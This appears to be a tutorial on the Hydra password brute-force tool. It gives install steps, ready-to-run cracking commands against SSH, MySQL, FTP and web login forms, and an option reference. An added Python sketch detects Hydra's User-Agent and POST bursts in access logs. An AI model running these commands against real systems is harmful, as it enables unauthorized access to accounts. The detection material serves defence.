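Passwords are one of the biggest security holes, and hydra shows how easy it is to gain unauthorized remote access to a system.
Supported platforms
All UNIX platforms (Linux, *BSD, Solaris, etc.)
MacOS (basically a BSD clone)
Windows with Cygwin (IPv4 and IPv6)
Mobile systems based on Linux, MacOS or QNX (e.g. Android, iPhone, BlackBerry 10, Zaurus, iPaq)
hydra compiles cleanly on Linux, Windows/Cygwin, Solaris, FreeBSD/OpenBSD, QNX (BlackBerry 10) and MacOS.
Supported protocols
Currently the tool supports the following protocols: Asterisk, AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET,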
HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-POST, HTTP-PROXY, HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD,
HTTPS-POST, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MEMCACHED, MONGODB, MS-SQL, MYSQL, NCP, NNTP, Oracle Listener, Oracle SID,
Oracle, PC-Anywhere, PCNFS, POP3, POSTGRES, Radmin, RDP, Rexec, Rlogin, Rsh, RTSP, SAP/R3, SIP, SMB, SMTP, SMTP Enum,
SNMP v1+v2+v3, SOCKS5, SSH (v1 and v2), SSHKEY, Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP
Compiling and installing hydra
Download: https://github.com/vanhauser-thc/thc-hydra
hydra official website: https://www.thc.org
./configure
make
make install
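Alternatively, you can install Kali, which ships with hydra; this is the approach I used.
# Kali Linux installation
1. Download the VMware version. I use VMware, so I downloaded the VMware 64-bit image.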
Kali Linux VMware 64-Bit (7z) https://images.kali.org/virtual-images/kali-linux-2021.1-vmware-amd64.7z
Kali Linux VMware 32-Bit (7z) https://images.kali.org/virtual-images/kali-linux-2021.1-vmware-i386.7z
Kali Linux VirtualBox 64-Bit (OVA) https://images.kali.org/virtual-images/kali-linux-2021.1-vbox-amd64.ova
Kali Linux VirtualBox 32-Bit (OVA) https://images.kali.org/virtual-images/kali-linux-2021.1-vbox-i386.ova
2. In VMware, choose [File]-[Open], browse to the extracted folder and select it; it works out of the box.
Common hydra usage (web side)
# mysql
hydra -l PrivateCloudUser -P /anquan/hydra/mysqlpassword.txt -e n -t 5 -vV 192.168.1.237 mysql
# ssh
hydra -l root -P /anquan/hydra/sshpassword.txt -e n -t 5 -vV 192.168.1.237 ssh
hydra -l root -p iampassword -e n -t 5 -vV 192.168.1.237 ssh
hydra -L /anquan/hydra/logins.txt -P /anquan/hydra/sshpassword.txt -M /anquan/hydra/targets.txt ssh -vV -o /anquan/hydra/r/ssh.txt
# ftp
hydra -l admin -p password ftp://localhost/
hydra -L default_logins.txt -p test ftp://localhost/
hydra -l admin -P common_passwords.txt ftp://localhost/
hydra -L logins.txt -P passwords.txt ftp://localhost/
# web
hydra -L /anquan/hydra/weblogins.txt -P /anquan/hydra/webpassword.txt -o /anquan/hydra/http_post.txt -t 1 -f 127.0.0.1 http-post-form "login.php:name=^USER^&pwd=^PASS^:<title>login fail</title>"
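When hydra brute-forces a login, one weakness gives the brute-force attempt away: the access log of the attacked web server contains requests carrying the string "Mozilla/5.0 (Hydra)", for example: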
11.20.13.9 - - [15/Apr/2021:19:54:29 +0800] "GET /l/l HTTP/1.0" 200 10642 "-" "Mozilla/5.0 (Hydra)"
11.20.13.9 - - [15/Apr/2021:19:54:29 +0800] "POST /l/l HTTP/1.0" 200 10642 "-" "Mozilla/5.0 (Hydra)"
11.20.13.9 - - [15/Apr/2021:19:54:29 +0800] "GET /l/l HTTP/1.0" 200 10642 "-" "Mozilla/5.0 (Hydra)"
11.20.13.9 - - [15/Apr/2021:19:54:29 +0800] "POST /l/l HTTP/1.0" 200 10642 "-" "Mozilla/5.0 (Hydra)"
11.20.13.9 - - [15/Apr/2021:19:54:30 +0800] "POST /l/l HTTP/1.0" 200 10642 "-" "Mozilla/5.0 (Hydra)"
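A detection sketch for the log signature described above, added here as an example (it is not part of the original post or of hydra). It parses access-log lines in the format shown, flags the "Mozilla/5.0 (Hydra)" User-Agent, and also flags bursts of POSTs from one source to one path, because the User-Agent is whatever the client chooses to send. The 203.0.113.7 and 198.51.100.4 lines, the threshold and the window are constructed assumptions, and lines are assumed to be in chronological order.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# First two lines are from the page; the 203.0.113.7 / 198.51.100.4 lines are constructed.
SAMPLE_LOG = '''\
11.20.13.9 - - [15/Apr/2021:19:54:29 +0800] "GET /l/l HTTP/1.0" 200 10642 "-" "Mozilla/5.0 (Hydra)"
11.20.13.9 - - [15/Apr/2021:19:54:29 +0800] "POST /l/l HTTP/1.0" 200 10642 "-" "Mozilla/5.0 (Hydra)"
203.0.113.7 - - [15/Apr/2021:20:01:00 +0800] "POST /l/l HTTP/1.1" 200 10642 "-" "Mozilla/5.0 (X11; Linux x86_64)"
203.0.113.7 - - [15/Apr/2021:20:01:01 +0800] "POST /l/l HTTP/1.1" 200 10642 "-" "Mozilla/5.0 (X11; Linux x86_64)"
203.0.113.7 - - [15/Apr/2021:20:01:01 +0800] "POST /l/l HTTP/1.1" 200 10642 "-" "Mozilla/5.0 (X11; Linux x86_64)"
203.0.113.7 - - [15/Apr/2021:20:01:02 +0800] "POST /l/l HTTP/1.1" 200 10642 "-" "Mozilla/5.0 (X11; Linux x86_64)"
198.51.100.4 - - [15/Apr/2021:20:05:10 +0800] "POST /l/l HTTP/1.1" 302 0 "-" "Mozilla/5.0 (X11; Linux x86_64)"
'''

LINE_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"')

def parse(line):
    """Parse one combined-format log line; return None if it does not match."""
    m = LINE_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return rec

def detect(lines, max_posts=3, window=timedelta(seconds=10)):
    """Return {source_ip: {reasons}} for Hydra UA hits and POST bursts."""
    findings = defaultdict(set)
    posts = defaultdict(list)  # (ip, path) -> POST timestamps inside the window
    for line in lines:
        rec = parse(line)
        if rec is None:
            continue
        if "(hydra)" in rec["ua"].lower():
            findings[rec["ip"]].add("hydra-user-agent")
        if rec["method"] == "POST":
            times = posts[(rec["ip"], rec["path"])]
            times.append(rec["ts"])
            while times[0] < rec["ts"] - window:  # slide the window forward
                times.pop(0)
            if len(times) > max_posts:
                findings[rec["ip"]].add("post-burst")
    return dict(findings)

if __name__ == "__main__":
    print(detect(SAMPLE_LOG.splitlines()))
```

The burst check ignores the status code on purpose: in the page's sample every attempt is answered with 200, so failed logins cannot be counted by status alone.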
hydra parameter reference
Options:
  -R        restore a previous aborted/crashed session
  -I        ignore an existing restore file (don't wait 10 seconds)
  -S        perform an SSL connect
  -s PORT   if the service is on a different default port, define it here
  -l LOGIN or -L FILE  login with LOGIN name, or load several logins from FILE
  -p PASS  or -P FILE  try password PASS, or load several passwords from FILE
  -x MIN:MAX:CHARSET  password bruteforce generation, type "-x -h" to get help
  -y        disable use of symbols in bruteforce, see above
  -r        rainy mode for password generation (-x)
  -e nsr    try "n" null password, "s" login as pass and/or "r" reversed login
  -u        loop around users, not passwords (effective! implied with -x)
  -C FILE   colon separated "login:pass" format, instead of -L/-P options
  -M FILE   list of servers to attack, one entry per line, ':' to specify port
  -o FILE   write found login/password pairs to FILE instead of stdout
  -b FORMAT specify the format for the -o FILE: text(default), json, jsonv1
  -f / -F   exit when a login/pass pair is found (-M: -f per host, -F global)
  -t TASKS  run TASKS number of connects in parallel per target (default: 16)
  -T TASKS  run TASKS connects in parallel overall (for -M, default: 64)
  -w / -W TIME  wait time for a response (32) / between connects per thread (0)
  -c TIME   wait time per login attempt over all threads (enforces -t 1)
  -4 / -6   use IPv4 (default) / IPv6 addresses (put always in [] also in -M)
  -v / -V / -d  verbose mode / show login+pass for each attempt / debug mode
  -O        use old SSL v2 and v3
  -K        do not redo failed attempts (good for -M mass scanning)
  -q        do not print messages about connection errors
  -U        service module usage details
  -m OPT    options specific for a module, see -U output for information
  -h        more command line options (COMPLETE HELP)
  server    the target: DNS, IP or 192.168.0.0/24 (this OR the -M option)
  service   the service to crack (see below for supported protocols)
  OPT       some service modules support additional input (-U for module help)
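Options:
  -R        restore a previously aborted/crashed session
  -S        perform an SSL (Secure Socket Layer) connection
  -s Port   specify the port when the server uses a port other than the default
  -l Login  enter the login ID when the login ID is already known
  -L FILE   when the login ID is not known, specify the file used for brute forcing (full path required)
  -p Pass   enter the login password when the password is already known
  -P FILE   when the password is not known, specify the file used for brute forcing (full path required)
  -x MIN:MAX:CHARSET  brute force without a file: generate passwords that satisfy the given character set and minimum/maximum length and try them
  -C FILE   specify a brute-force file in colon-separated form, i.e. ID:Password
  -M FILE   specify the file listing the servers to attack in parallel
  -o FILE   write the results to FILE in the same form as the STDOUT output
  -f        stop cracking when the first usable ID and password are found
  -t TASKS  specify the number of parallel connections (default: 16)
  -w        specify the response wait time (Waittime) for each thread (default: 32 seconds)
  -4/6      specify IPv4/IPv6 (default: IPv4)
  -v/-V     show detailed information
  -U        view service module usage details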